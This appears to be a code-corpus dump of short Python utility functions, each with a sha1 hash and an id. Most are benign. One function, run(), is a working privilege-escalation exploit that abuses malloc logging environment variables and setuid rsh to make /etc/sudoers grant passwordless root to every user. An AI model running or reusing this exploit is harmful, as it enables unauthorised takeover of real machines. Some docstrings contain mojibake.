content
stringlengths
35
416k
sha1
stringlengths
40
40
id
int64
0
710k
import random def random_word_swap(sentence, p): """Swaps words from a sentence with probability p.""" def swap_word(new_words): idx_1 = random.randint(0, len(new_words) - 1) idx_2 = idx_1 counter = 0 while idx_2 == idx_1: idx_2 = random.randint(0, len(new_words) - 1) counter += 1 if counter > 3: return new_words new_words[idx_1], new_words[idx_2] = new_words[idx_2], new_words[idx_1] return new_words words = sentence.split(' ') new_words = words.copy() n = int(p * len(words)) for _ in range(n): new_words = swap_word(new_words) sentence = ' '.join(new_words) return sentence
f81467776a3c1e8bae3fdb411bd95f8c6440fea2
24,550
def range_string_to_list(range_string): """returns a list of the values represented by a range string""" if range_string == "": return [] output = list() for x in range_string.split(","): y = x.split("-") if len(y) > 1: output.extend(range(int(y[0]), int(y[1]) + 1)) else: output.append(int(y[0])) return output
30522a4faefbcc2e5d01fd5236915da5d897459a
24,551
def which_recovered(recovered_names, all_names): """Produce dictionary of recovered TRUE/FALSE""" recovery_dict = {} for name in all_names: if name in recovered_names: recovery_dict[name] = 'TRUE' else: recovery_dict[name] = 'FALSE' return(recovery_dict)
3a8885ad1f88af373db69f83df8d5a63b7c8facf
24,553
def is_array_type(rtype): """ Test to see if return type parameter is a NumPy array. :param str rtype: Return type parameter. :return: *True* if return type parameter is a NumPy array, *False* if not. :rtype: bool """ if rtype.lower() in ['ndarray', 'array', 'arr', 'np', 'a']: return True return False
6973a9e1830b89fea87c70e42df97bbfc39e49c2
24,554
import os def find_input_path(): """ Walks backwards (two levels) until it locates the root pom.xml. This allows the module to run from multiple folder depths within the docs tree """ if os.path.exists("../pom.xml"): return "../" if os.path.exists("../../pom.xml"): return "../../"
a87e98f0f5dc6a01645c11476a1f79e79c4ac4de
24,555
def check_error_category(err_cat, err_msg, out_dict): """ Check if parser error of the non-critical category (err_cat != 1) are actually consistent and may be discarded. :param err_cat: the error-category of the error message to be investigated :param err_msg: the error-message :param out_dict: the dict of results obtained from the parser function :returns: True/False if message is an error or warning """ # check special cases: # 1. nonco_angle_file not present, but newsosol==False anyways if 'NONCO_ANGLES_OUT' in err_msg: if "use_newsosol" in list(out_dict.keys()): if out_dict["use_newsosol"]: return True else: return False else: return True # default behavior if err_cat == 1: return True else: return False
a518f736b5711080363deffe840fc37404e40413
24,557
def convert_escaped_unicode_literal( text: str ) -> str: """Convert any escaped Unicode literal hexadecimal character(s) to the proper character(s). This function will convert a string, that may contain escaped Unicode literal hexadecimal characters, into a string with the proper characters. Args: text (:obj:`str`): The string that may have escaped Unicode hexadecimal. :rtype: :obj:`str` A string with each escaped Unicode hexadecimal character converted into the proper character. The following Unicode literal formats are supported:: \\x31 \\u0031 \\U00000031 Examples: Basic usage:: >>> from flutils.strutils import convert_escaped_unicode_literal >>> a = '\\\\x31\\\\x2e\\\\u2605\\\\x20\\\\U0001f6d1' >>> convert_escaped_unicode_literal(a) '1.โ˜… ๐Ÿ›‘' This function is intended for cases when the value of an environment variable contains escaped Unicode literal characters that need to be converted to proper characters:: $ export TEST='\\x31\\x2e\\u2605\\x20\\U0001f6d1' $ python :: >>> import os >>> from flutils.strutils import convert_escaped_unicode_literal >>> a = os.getenv('TEST') >>> a '\\\\x31\\\\x2e\\\\u2605\\\\x20\\\\U0001f6d1' >>> convert_escaped_unicode_literal(a) '1.โ˜… ๐Ÿ›‘' """ text_bytes = text.encode() return text_bytes.decode('unicode_escape')
27f50f0878f45b3637e284b9ec2d6a6098f56df6
24,558
def check_magnetic_atoms(in_path: str) -> list: """ Args: in_path (str) - path for the prepared to siman structure reader POSCAR type file. Returns: magnetic_atoms (list) - list of magnetic atoms in prepared structures with "fake" atoms e.g >>> magnetic_atoms ['Po', 'Eu'] """ with open(in_path, 'r') as in_f: in_data = in_f.readlines() magnetic_atoms = in_data[5].split()[: 2] return magnetic_atoms
b0428fea0767688823b30cab14a11052fed0d149
24,560
def new_feature_collection(features=None): """ :param features: :return: """ # set features to empty list by default if features is None: features = [] # build a geojson feature collection feature_collection = { "type": "FeatureCollection", "features": features } return feature_collection
5a58bedcbcfcd4e0a317dbde301e5bbb3221373b
24,561
def get_solver_param(sim_param=1): """Get parameters related to this simulation run""" theta = None deadline = None horizon = None solver_type = None if sim_param == 1: theta = 2 deadline = 6 horizon = 3 solver_type = 'central' elif sim_param == 2: theta = 3 deadline = 6 horizon = 3 solver_type = 'central' elif sim_param == 3: theta = 3 deadline = 6 horizon = 3 solver_type = 'distributed' elif sim_param == 4: theta = 10 deadline = 10 horizon = 10 solver_type = 'central' elif sim_param == 5: theta = 20 deadline = 20 horizon = 20 solver_type = 'central' else: print("No other options available at this time") exit() return horizon, theta, deadline, solver_type
dd25af8c0c85791710ab1f0c60678e8bebc6d154
24,562
import torch from typing import Callable from typing import Iterable from typing import Tuple def make_batcher( x: torch.Tensor, y: torch.Tensor, batch_size: int ) -> Callable[[], Iterable[Tuple[torch.Tensor, torch.Tensor]]]: """Returns a function that can be called to yield batches over x and y.""" assert x.shape[0] == y.shape[0] idxes = range(0, x.shape[0], batch_size) def batcher() -> Iterable[Tuple[torch.Tensor, torch.Tensor]]: for start in idxes: end = start + batch_size yield x[start:end], y[start:end] return batcher
2bcb36b9eca07f86aed565a437bdb2b9b5cb21f6
24,564
def momentum(prices): """This function finds the momentum metric for a group of assets. Inputs: ------- prices (pandas dataframe|series): dataframe with the information of the prices of a group of assets or an indivitual asset. Outputs: -------- momentum_df (pandas Dataframe): dataframe with the information of the momentum. """ # Compute components: first = prices.iloc[0] last = prices.iloc[-1] # Compute momentum: momentum_df = last/first return momentum_df
442c24b0602877293aa03b905f3ce47692a3cc21
24,566
import re def munge_subject_to_filename(subject): """Derive a suitable filename from a commit's subject""" if subject.endswith('.patch'): subject = subject[:-6] return re.sub(r'[^A-Za-z0-9-]+', '_', subject).strip('_').lower() + '.patch'
b67350f2f4003f04c234103a2e3f7f1bf34dedbf
24,567
def abstract_class(cls_): """Decorate a class, overriding __new__. Preventing a class from being instantiated similar to abc.ABCMeta but does not require an abstract method. """ def __new__(cls, *args, **kwargs): if cls is cls_: raise TypeError(f'{cls.__name__} is an abstract class and may not be instantiated.') return object.__new__(cls) cls_.__new__ = __new__ return cls_
15e6f5472b3a6e29ad26fd9c705ea418e9917ceb
24,569
def SmoothWrap( histogram, window_size ): """smooth histogram by sliding window-method, where the window is wrapped around the borders. The sum of all values is entered at center of window. """ new_histogram = [0] * len(histogram) half_window_size = window_size / 2 length = len(histogram) # 1. start with window cumul = 0 for i in range( length - half_window_size, length): cumul = cumul + histogram[i] for i in range( 0, half_window_size + 1): cumul = cumul + histogram[i] ## 2. iterate over histogram and add values over windows_size y = length - half_window_size z = half_window_size for i in range( 0, length): new_histogram[i] = cumul y = y + 1 z = z + 1 if y >= length: y = 0 if z >= length: z = 0 cumul = cumul - histogram[y] + histogram[z] return new_histogram
0fccbab170a140645a6354c7d0d02f94a1c12f0a
24,571
def is_upvoted(submission): """ If a comment is upvoted, we assume the question is welcomed, and that there's no need for a template answer. """ min_score = 3 min_comment_count = 1 return ( submission.score > min_score and len(submission.comments) > min_comment_count )
90fe43e6cd681a15daa97dba039e7fa94ac617ca
24,572
from typing import Optional from typing import Type from typing import Callable def register_operator( cls: Optional[Type] = None, *, sql_operator: Optional[Callable] = None ): """Register a class as an operator class. :param cls: Registering an operator without providing a builtin SQLAlchemy builtin operator. :param sql_operator: A sqlalchemy operator or a custom callable that acts as an sqlalchemy operator. """ def decorator(clazz: Type): clazz.operator = property(lambda self: sql_operator) return clazz if cls is not None: return decorator(cls) return decorator
faeb551715c23871ce1e87c1c2234b02ebb14611
24,573
import asyncio def get_task_id(): """Return the current task identify""" return id(asyncio.current_task())
b99fdc06cd089b6e3e1b93e056f0018ca6a0ad55
24,574
def min_max_scale(tensor, min_val=0, max_val=1, dim=0): """Rescale value to be in a given range across dim.""" tensor = tensor.float() std_tensor = (tensor - tensor.min(dim=dim, keepdim=True)[0] ) / (tensor.max(dim=dim, keepdim=True)[0] - tensor.min(dim=dim, keepdim=True)[0]) scaled_tensor = std_tensor * (max_val - min_val) + min_val return scaled_tensor
a064b2c8ca098448cb6a665f716411278641713a
24,575
import os def auto_mtime(fn): """ Gets the mtime of fn, or None if the file does not exist. """ try: return os.path.getmtime(fn) except: return None
632ff58594836c532c3a3a56c338b0149736875a
24,576
from typing import List import os import re def read_requirements(path: str) -> List[str]: """ Load the requirements and support `-r` option to load dependent requirement files """ with open(path, 'r', encoding='utf-8') as f: all_reqs = f.read().split('\n') # find embedded requirements inside (e.i., `-r <other requirements>`) # "pip install -r <file>" handles nested requirements, so do that too here root = os.path.dirname(path) sub_reqs = [] filtered_reqs = [] for x in all_reqs: m = re.findall(r'^-r\s+(\S+)', x) if len(m) == 1: sub_reqs += read_requirements(os.path.join(root, m[0])) elif len(x) > 0: filtered_reqs.append(x) return filtered_reqs + sub_reqs
e170e32139ad42d3a17a1f517b34810dfffb213e
24,577
def encode(message, rails): """ Encode the message """ rows, ind, direction = ["" for i in range(rails)], 0, 1 for char in message: rows[ind] += char ind += direction if ind in [rails, -1]: direction *= -1 ind += direction * 2 return "".join(rows)
87404107afa970db1597dbda4dfee9b52bf1b893
24,579
import os def get_var(var_name: str): """Get an ENV VAR""" return os.environ[var_name]
eba1aecbd6a3aa57eef043f50a927efe26963756
24,580
def get_label(filename, labels=["head", "body", "arm","tail", "leg", "ear"]): """ If the filename contains the word in the list called labels, it returns a pair of name and id number. example: get_labels(./raccoon/labels/head.ply, ["head, leg"]): It will return ("head",0) get_labels(./raccoon/somefilename.ply, ["goose","raccoon"]): It will return ("raccoon,1") """ for label in labels: if label.lower() in filename.lower(): return (label, labels.index(label)) return -1 #raise Exception("There exists no label with "+ filename +". Provide the label of the contained file through the folder name or filename.")
6c83e714de6c0b4959524110ac8dbe2f5210485d
24,581
def mendeleev(n): """ Links atomic number with atom type. """ periodic_table = { 1: "H", 2: "He", 3: "Li", 4: "Be", 5: "B", 6: "C", 7: "N", 8: "O", 9: "F", 10: "Ne", 11: "Na", 12: "Mg", 13: "Al", 14: "Si", 15: "P", 16: "S", 17: "Cl", 18: "Ar", 19: "K", 20: "Ca", 21: "Sc", 22: "Ti", 23: "V", 24: "Cr", 25: "Mn", 26: "Fe", 27: "Co", 28: "Ni", 29: "Cu", 30: "Zn", 31: "Ga", 32: "Ge", 33: "As", 34: "Se", 35: "Br", 36: "Kr", 53: "I" } return periodic_table.get(n)
9c403b510be36b846400ba40b91e8a430f2a48b7
24,582
from typing import Tuple def api_keys(api_keys_function) -> Tuple[str, str]: """ Fixture that saves an api key - api secret pair object in database and returns a tuple (ApiKey, ApiSecret). This fixture does automatic cleanup (deletes the pair in the database) after test run. :return: Returns a tuple of api key and secret. """ return api_keys_function()
a7cf5c1b35c88d6e8a4e9635a2ac7f74534acc50
24,583
def do_find(lookup: dict, term: str) -> list: """Match term against keywords.""" output = [] seen = set() for emoji, keywords in lookup.items(): for keyword in keywords: if term in keyword and emoji not in seen: output.append((keywords[0], emoji)) seen.add(emoji) return output
bd0493fd2714622a9faa1dcf8b177b0537061aeb
24,584
def _get_dropbox_path_from_dictionary(info_dict, account_type): """ Returns the 'path' value under the account_type dictionary within the main dictionary """ return info_dict[account_type]['path']
0869c08cd9d0f70d9dcdeb5bee843a6c9046d5bc
24,585
def binary_search(array, value): """Search for value in sorted array, using binary search Continually divide (sub-) array in half until value is found, or entire array has been searched. Iterative approach. Parameters array : list List to search. Must be sorted. value : any Value to search for. Must be same type as elements in array. Returns ------- bool True if array contains value, False otherwise """ # Set starting indexes, which will be used to index sub-array as it shrinks low = 0 high = len(array) - 1 # Keep searching until low and high pointers overlap while (high - low) > 0: mid = int((high + low) / 2) # Check to see if dividing index (mid) equals value we're searching for if array[mid] == value: return True elif value < array[mid]: # -1 since don't want to check value at mid again (redundant) high = array[mid] - 1 elif value > array[mid]: # +1 since don't want to check value at mid again (redundant) low = array[mid] + 1 return False
08fc6be6571854a0003a7ccc354c397dfb791059
24,586
from typing import Tuple def blend_colors( rgba: Tuple[int, int, int, float], rgb: Tuple[int, int, int] ) -> Tuple[int, int, int]: """Get the resulting RGB color of an RGBA color rendered over an RGB color.""" red = (rgba[0] * rgba[3]) + (rgb[0] * (1 - rgba[3])) blue = (rgba[1] * rgba[3]) + (rgb[1] * (1 - rgba[3])) green = (rgba[2] * rgba[3]) + (rgb[2] * (1 - rgba[3])) result_color = int(red), int(blue), int(green) return result_color
bf48b7193002a48aa8996c543c3bd5633ae06362
24,587
import itertools def cc_barrett_optimized(net,node,anet,undefReturn=0.0): """Multiplex clustering coefficient defined by Barrett et al. See SI of "Taking sociality seriously: the structure of multi-dimensional social networks as a source of information for individuals.", Louise Barrett, S. Peter Henzi, David Lusseau, Phil. Trans. R. Soc. B 5 August 2012 vol. 367 no. 1599 2108-2118 \frac{\sum_j^n \sum_h^n \sum_k^b ( a_{ijk} \sum_l^b (a_{ihl} \sum_m^b a_{jhm} ) )} {\sum_j^n \sum_h^n \sum_k^b (a_{ijk} \sum_l^b \max(a_{ihl},a_{jhl}) )} """ degree=anet[node].deg() if degree>=2: nom,den=0,0 for i,j in itertools.combinations(anet[node],2): nij=anet[node][i]*anet[node][j] ij=anet[i][j] if ij!=anet.noEdge: nom+=nij*ij ineighs=set(anet[node]) for j in anet[node]: jneighs=set(anet[j]) for h in ineighs | jneighs: m=0 if net.fullyInterconnected: layers=net.slices[1] else: layers=net._nodeToLayers[h] #itertools.imap(lambda x:x[0],net._nodeToLayers[h]) for layer in layers: m+=max(net[node,h,layer],net[j,h,layer]) den+=anet[node,j]*m if den!=0.0: return 2*nom/float(den) else: return undefReturn else: return undefReturn
f13ebf0e85deaf1e332e9bfd9613b406681188c1
24,588
def stripnl(s): """remove newlines from a string""" return str(s).replace("\n", " ")
da0a46707b19b6faa054cd1e4dad96b9651b3f0b
24,589
from typing import List def solution(board: List[List[int]]) -> int: """ ์ž…๋ ฅ๋œ 2์ฐจ์› ๋ฐฐ์—ด์—์„œ ๊ฐ€์žฅ ํฐ 1๋กœ ๋œ ์ •์‚ฌ๊ฐํ˜•์„ ๊ตฌํ•˜๋ผ Args: board (List[List[int]]): ๊ฐ๊ฐ์˜ ์›์†Œ๊ฐ€ 1์ด๋‚˜ 0์œผ๋กœ ๋˜์–ด ์žˆ๋Š” 2์ฐจ์› ๋ฐฐ์—ด Returns: int: ๊ฐ€์žฅ ํฐ ์ •์‚ฌ๊ฐํ˜•์˜ ๋„“์ด """ row, calumn = len(board), len(board[0]) global_max = 0 for i in range(row): for j in range(calumn): if not (i and j): global_max = board[i][j] if board[i][j] > global_max else global_max continue if board[i][j]: near = [board[i - 1][j - 1], board[i - 1][j], board[i][j - 1]] board[i][j] = min(near) + 1 global_max = board[i][j] if board[i][j] > global_max else global_max return global_max * global_max
a34b7decafc1dc79bce566335e4edba7900e7744
24,592
import re def distribute(string, delim, groups=[r'\S+', r'\S+']): """Distributes one part of a string to other parts of that string (seperated by a delimiter), returning a list of strings. Args: string: input string delim: regex matching delimiter between two parts of string to be distributed upon groups: list of regular expressions that match the parts of the string receiving the distributed portion of the string. defaults to [r'\S+', r'\S+'] (i.e. two blocks of non-whitespace) Returns: If delimiter and groups are found, returns a list of strings. If they are not found, returns a list containing just the original string. Examples: >>> distribute('hot spam/eggs', r'/') ['hot spam', 'hot eggs'] >>> distribute('hot spam/eggs on toast', r'/') ['hot spam on toast', 'hot eggs on toast'] >>> distribute('hot spam/eggs on toast', r'/', [r'\S+', r'\S+ on toast']) ['hot spam', 'hot eggs on toast'] """ output = [] n = len(re.findall(delim, string)) + 1 gps = groups + [groups[-1]] * (n - len(groups)) rx = re.compile(delim.join([r'(' + group + r')' for group in gps])) re_match = rx.search(string) if re_match: output = [rx.sub(re_match.group(i), string) for i in range(1, n+1)] else: return [string] return output
3b64474cabdf755bd41088e9e7f8d8a6e20adec4
24,593
import torch def integral_vector(X,theta,l,mu,cov): """ X : (n,d) tensor theta : 0d tensor or float l : (d,) tensor mu : (d,) tensor cov : (d,d) tensor outputs (n,) tensor """ C = cov + torch.diag(l**2) L = torch.cholesky(C,upper=False) Xm = X - mu #nxd# LX = torch.triangular_solve(Xm.transpose(1,0),L,upper=False)[0] #d x n expoent = -0.5*torch.sum(LX**2,dim=0) #(n,) det = torch.prod(1/l**2)*torch.prod(torch.diag(L))**2 #|I + A^-1B| vec = theta/torch.sqrt(det)*torch.exp(expoent) #(n,) return vec
7fa550f6d642aa5459e1e4f3ce3c08e20e73c6c9
24,594
def showDag(n=None): """ showDag(n) -> None Show the tree view of a group node or opens a node control panel. @param n: Optional Group. @return: None """ return None
9fa1866bcfa470220b26493cd934002005446b49
24,596
def handle_connection_error(err): """ connection exception handler """ return 'docker host not found: ' + str(err), 500
95c5c75758653fb701001ca6c9943481276bd652
24,597
import torch def observability_matrix(A, C, m): """ Create observability matrix Args: A: C: m: Returns: """ Om = torch.cat([C, torch.matmul(C, A)], dim=0) # print(Om.shape) for i in range(1, m - 1, 1): CA_product = torch.matmul(C, torch.pow(A, i)) Om = torch.cat([Om, CA_product], dim=0) # #print(Om) return Om
59d38a1f787cd10969f8b56024549d0656801513
24,598
def throttle_angle_to_thrust(r, theta): """ Assumes theta in degrees and r = 0 to 100 % returns a tuple of percentages: (left_thrust, right_thrust)""" theta = ((theta + 180) % 360) - 180 # normalize value to [-180, 180) r = min(max(0, r), 100) # normalize value to [0, 100] v_a = r * (45 - theta % 90) / 45 # falloff of main motor v_b = min(100, 2 * r + v_a, 2 * r - v_a) # compensation of other motor if theta < -90: return -v_b, -v_a if theta < 0: return -v_a, v_b if theta < 90: return v_b, v_a return v_a, -v_b
0f8b11d1c6de0674602f92f577e83e026b31e727
24,599
import random def generateColor(text): """Deterministically generates a colour for a given text.""" random.seed(text) return ('#%06X' % random.randint(0,0xFFFFFF))
6577ba33642b68bdef3d1cec914078fa1d2b8b27
24,600
from typing import List from typing import Tuple from typing import Union def _parse_array(tokens: List[str]) -> Tuple[Union[list, str], List[str]]: """ >>> _parse_array(list("1,{2,3}};abc")) (['1', ['2', '3']], [';', 'a', 'b', 'c']) >>> _parse_array(list("1}")) (['1'], []) >>> _parse_array(list("")) ([], []) """ array: List[Union[list, str]] = [] while tokens: token, *tokens = tokens if token == "}": return array, tokens if token == "{": sub_array, tokens = _parse_array(tokens) array.append(sub_array) elif token != ",": array.append(token) assert tokens[0] == "}" or tokens[0] == "," return array, tokens
6239a89691d47a43ddd8febcb77e8c90fd4944e3
24,601
def delete_var(var, detach=False, breakline=True): """Query for deleting the input variable. Parameters ---------- var Name of the variable to remove """ detach = "" n = "" if detach is True: detach = "DETACH " if breakline: n = "\n" return "{}DELETE {}{}".format(detach, var, n)
b2f4cf80ab3319b81123c4a9cc4fb238b1db6dd3
24,605
def unit_size(size): """ Convert Byte size to KB/MB/GB/TB. """ units = ['KB', 'MB', 'GB', 'TB'] i = 0 size = size / 1024 while size >= 1024 and i<(len(units)-1): i = i + 1 size = size / 1024 return '%.2f %s'%(size, units[i])
9f174d94cd7c3e57399f0689d67c35fe97da5e23
24,607
def tally_output(cons_file, output_path, file_stem): """Writes a tally file for easy graphing/analysis.""" tally_file = "{}/{}.tally".format(output_path, file_stem) with open(cons_file, "r") as reader, open(tally_file, "w") as writer: for line in reader: if line.startswith('#'): writer.write(line.split('# ')[1]) return tally_file
02c1b20a1e71482344e5ad8516a2f8ed86429a60
24,608
import os def relation_id(): """The relation ID for the current relation hook""" return os.environ.get('JUJU_RELATION_ID', None)
8773099418d238d90d95e2b2cadcc06f238e3013
24,609
import os def _make_default_output_name(input_dir, input_type): """ Create filename by concatenating 'input_dir'/processed_'input_type'.json """ input_dir = input_dir.rstrip(os.path.sep) return os.path.join(os.path.dirname(input_dir), "processed_%s.json" % input_type)
d0e1300fbfac9b0d515f8855477644a91e807dee
24,610
def calc_check_sum(data): """ data[2:-2]ใฎใƒใ‚งใƒƒใ‚ฏใ‚ตใƒ ใ‚’่จˆ็ฎ—ใ—่ฟ”ใ™ @param data ใƒ‡ใƒผใ‚ฟใ€‚4ใƒใ‚คใƒˆไปฅไธŠใฎ้•ทใ•ใŒๅฟ…่ฆ @return ใƒใ‚งใƒƒใ‚ฏใ‚ตใƒ  """ cksum = 0 for i in range(2, len(data) - 2): cksum += data[i] return cksum % 65536
d44e362528ac47a037ed7dbc32a3ca32c04dba54
24,611
def find_constant_parameters(parameter_array): """ Checks which parameters are constant :param parameter_array: Return array from parameter.get_parameter_array(setup) :return: A True / False array with the len(result) == len(parameter_array) """ return (parameter_array['maxbound'] - parameter_array['minbound'] == 0.0)
a0153d39065d48a1a519ff029e76ab030bd444d3
24,614
def project_is_connected(project, user): """ Return True if the given project is connected (joined and authorized). """ return project.is_joined(user)
7d513406f1ec66eb57d8f7a6f0dc5688d521f755
24,617
def ds_from_s(distance): """ Calculate {displacement} from {distance}. The chosen scheme: displacement at [i] represents the distance from [i-1] to [i]. Args: {distance_arg} Returns: {displacement_returns} """ # Should this assume the index at position 0 is 0, or should this # assume the only NaN is at position 0? Assumpts either way... # Also could accomplish this behavior with bfill. Hmm. return distance.diff().fillna(distance[0])
0e1e419aa0fe6f5dbc20a8cda2cdcd08d74e418d
24,619
def pssm_recovery_map_range(struct,pssm_map,min,max): """calculate the pssm recovery within a range of b factors given a structure and a pssm map""" struct_residues = struct.get_residues() recovery_map = {} for residue in struct_residues: score = residue.get_list()[1].get_bfactor() if score >= min and score <= max: residue_name = residue.get_resname() residue_num = residue.get_id()[1] status = pssm_map.conserved(residue_num, residue_name) if status: try: recovery_map[residue_name]+= 1 except KeyError: recovery_map[residue_name] = 1 return recovery_map
805bbba61e754f9fc6242e09a98ffa891af2434b
24,621
import os import time def run(): """runs exploit""" size = os.stat("/etc/sudoers").st_size env = dict() env["MallocLogFile"] = "/etc/crontab" env["MallocStackLogging"] = "yes" env[ "MallocStackLoggingDirectory" ] = 'a\n* * * * * root echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers\n\n\n\n\n' print("Trying /etc/crontab...") pid = os.fork() if pid == 0: os.close(1) os.close(2) os.execve("/usr/bin/rsh", ["rsh", "localhost"], env) time.sleep(1) try: crontab = open("/etc/crontab").read() if "NOPASSWD" not in crontab: return except IOError: return print("Done \nWaiting for /etc/sudoers to change (<60 seconds)...") while os.stat("/etc/sudoers").st_size == size: print(".") time.sleep(1) return True
11143ba539260f92be09c83d5f5429c2fa398bdd
24,626
def filter_lower_case_keys(dict): """ Filter dict to include only lower case keys. Used to skip HTTP response fields. :param dict: Dict with all capabilities parsed from the SSDP discovery. :return: Dict with lower case keys only. """ return {key: value for key, value in dict.items() if key.islower()}
f441202f6ae66ab023431c42680f349169ea0f79
24,627
import textwrap def _wrap_data_with_information(data: str, paste_url: str) -> str: """ Just adds an "information line" to the botton of the paste content identifying from where said paste information came from. data - the data we want to wrap paste_url - the URL from which this data came from returns the wrapped data """ return data + textwrap.dedent(f""" This data can also be found in pastebin, at the following URL: {paste_url}""")
bae7bbe49b3a8be2d485b6be21ea6f18b40383e1
24,628
def clean_constant_rows(data): """Drop rows with constant calues. Parameters: data (pd.DataFrame): Data from an html table Returns: data (pd.DataFrame): Data from an html table Raises: None """ data = data.transpose() data = data.loc[:, (data != data.iloc[0]).any()] data = data.transpose().reset_index(drop=True) return data
59c0472ad44b3a60c53aa9d412f7a423281b4892
24,633
def find_abs_death_props(params, abs_props): """ Calculate the absolute proportion of all patients who should eventually reach hospital death or ICU death. """ # Find IFR that needs to be contributed by ICU and non-ICU hospital deaths\ hospital_death, icu_death = [], [] for i_agegroup, agegroup in enumerate(params["all_stratifications"]["agegroup"]): # If IFR for age group is greater than absolute proportion hospitalised, increased hospitalised proportion if params["adjusted_infection_fatality_props"][i_agegroup] > \ abs_props["hospital"][i_agegroup]: abs_props["hospital"][i_agegroup] = params["adjusted_infection_fatality_props"][i_agegroup] # Find the target absolute ICU mortality and the amount left over from IFRs to go to hospital, if any target_icu_abs_mort = \ abs_props["icu"][i_agegroup] * \ params["icu_mortality_prop"] left_over_mort = \ params["adjusted_infection_fatality_props"][i_agegroup] - \ target_icu_abs_mort # If some IFR will be left over for the hospitalised if left_over_mort > 0.: hospital_death.append(left_over_mort) icu_death.append(target_icu_abs_mort) # Otherwise if all IFR taken up by ICU else: hospital_death.append(0.0) icu_death.append(params["adjusted_infection_fatality_props"][i_agegroup]) return {"hospital_death": hospital_death, "icu_death": icu_death}
120e1fe46344e674f5240b075cb78d8d4b5d2155
24,635
def supports_int(value: object) -> bool: # noqa: E302 """Check if an int-like object has been passed (:class:`~typing.SupportsInt`). Examples -------- .. code:: python >>> from nanoutils import supports_int >>> supports_int(1.0) True >>> supports_int(1.5) False >>> supports_int(1) True >>> supports_int('1') True >>> supports_int('not a int') False Parameters ---------- value : :class:`object` The to-be evaluated object. Returns ------- :class:`bool` Whether or not the passed **value** is int-like or not. """ # floats that can be exactly represented by an integer are also fine try: int(value) # type: ignore return float(value).is_integer() # type: ignore except Exception: return False
c7a920837a080030d1300c99951d887ed4917091
24,637
from typing import Callable from typing import Dict from typing import Any def memoized(func: Callable) -> Callable: """Decorator that caches values returned by a function for future calls. The first time func is called with a particular sequence of arguments, the result is computed as normal. Any subsequent calls to func with the same sequence of arguments will then return the same value without requiring it to be recomputed. """ memo: Dict[Any, Any] = {} def memo_func(*args: Any) -> Any: if args not in memo: memo[args] = func(*args) return memo[args] return memo_func
fd348711215713aff3361cfc47609634a457de88
24,638
def intify_and_make_intron(junction): """Convert start and stop strings to ints and shorten the interval Interval is shortened to match the introns of SJ.out.tab files from STAR Parameters ---------- junction : tuple (chrom, start, stop, strand) tuple of strings, e.g. ('chr1', '100', '200', '-') Returns ------- intron : tuple (chrom, start, stop, strand) tuple of string, int, int, string. Adds 1 to original start and subtracts 1 from original stop >>> intify_and_make_intron(('chr1', '100', '200', '-')) ('chr1', 101, 199, '-') """ chrom, start, stop, strand = junction start = int(start) + 1 stop = int(stop) - 1 return chrom, start, stop, strand
200a8504e0a28194ea70fe9e9702094b6ddeb1f1
24,640
def get_value_for_key_from_json(key, data_structure): """ Given a data_structure return the *first* value of the key from the first dict example: data_structure: [ { "id": 1, "name": "name1" }, { "id": 2, "name": "name2"} ] key: "id" return 1 :param key: key of a dict of which to return the value :param data_structure: python data_structure :return: value of key in first dict found """ if type(data_structure) == list: for v in data_structure: # print("recursively searching %s" % str(v)) r = get_value_for_key_from_json(key, v) if r is not None: return r return None elif type(data_structure) == dict: if key in data_structure: return data_structure[key] else: for k in data_structure: v = data_structure[k] # print("recursively searching %s" % str(v)) r = get_value_for_key_from_json(key, v) if r is not None: return r return None
071d6c771d750bdef99a209ba537d0709c1d9582
24,641
import pickle def predict(dataX): """ Predict dependent variable from a features vector """ # load model model = pickle.load(open('model.pickle', 'rb')) # predict predY = model.predict(dataX.values.reshape(-1, dataX.shape[1])) return predY
85505d3435ad8593542851680aef7491058a0239
24,642
def format_pci_addr(pci_addr): """Pad a PCI address eg 0:0:1.1 becomes 0000:00:01.1 :param pci_addr: str :return pci_addr: str """ domain, bus, slot_func = pci_addr.split(':') slot, func = slot_func.split('.') return '{}:{}:{}.{}'.format(domain.zfill(4), bus.zfill(2), slot.zfill(2), func)
9da677c2f1ff832cfbe86f19dffcada1fb33003a
24,643
def process_groups(group_file): """ Read in a comma-delimited file of dataset groups and format them as a list of lists """ datasets = [] with open(group_file, 'r') as f: for line in f: line = line.strip() datasets.append(line.split(",")) return datasets
1ba72902742aad5b46128c436d1023d4ee519d80
24,644
import re def make_url_pattern(url: str, version: str) -> str: """Returns a regular expression for matching versioned download URLs. Args: url: Existing download URL for `version`. version: Version corresponding to `url` (must be a substring). Returns: Regular expression that matches URLs similar to `url`, where all instances of `version` are replaced by match groups. """ replacement_temp = 'XXXXXXXXXXXXXXX' return re.escape(url.replace(version, replacement_temp)).replace( replacement_temp, '([^/"\']+)')
384a58bf8ef02b75f510fe5884445e297862f0ef
24,647
import re def parse_not_to_prune(model, config): """Returns a list of names of modules not to prune in the model""" patterns = [re.compile(s) for s in config.not_to_prune] parsed_not_to_prune = [] for name, module in model.named_modules(): if type(module).__name__ in config.prune_layer_types: if any([p.search(name) for p in patterns]): parsed_not_to_prune.append(name) return parsed_not_to_prune
71e56a5c3d9a2502e8309225feeb127b8b98f7eb
24,648
def getListePions(c): """ retourne la liste des pions se trouvant sur la carte paramรจtre: c une carte """ return c['pions']
e4711415abf685b430596143803ece982183ba9c
24,649
import requests def internet_on(): """ Check if connected to Internet """ try: requests.get('https://google.com', timeout=4) return True except requests.ConnectionError: return False
fe53cf6d42dbdde0b4040eafea89184539ef7e24
24,650
def right(x): """Helper function: argument x must be a dot. Returns dot right of x.""" return (x[0]+1,x[1])
bbb9b16ddbecd8bb452d941e5a871c9799f2ca7a
24,651
def isMatch(peak, biomarker, tolerance): """Check if spectral peak matches protein biomarker Args: peak: Spectral peak obatained from experiment, float biomarker: An array of biomarker values tolerance: Maximal difference between experimental weight and theoretical one that could be considered a match. float Return: True / False """ for each in biomarker: if abs(float(peak) - each) <= float(tolerance): return True return False
a81a67deca75a4d41c17707dc2e8e528c8fc3949
24,654
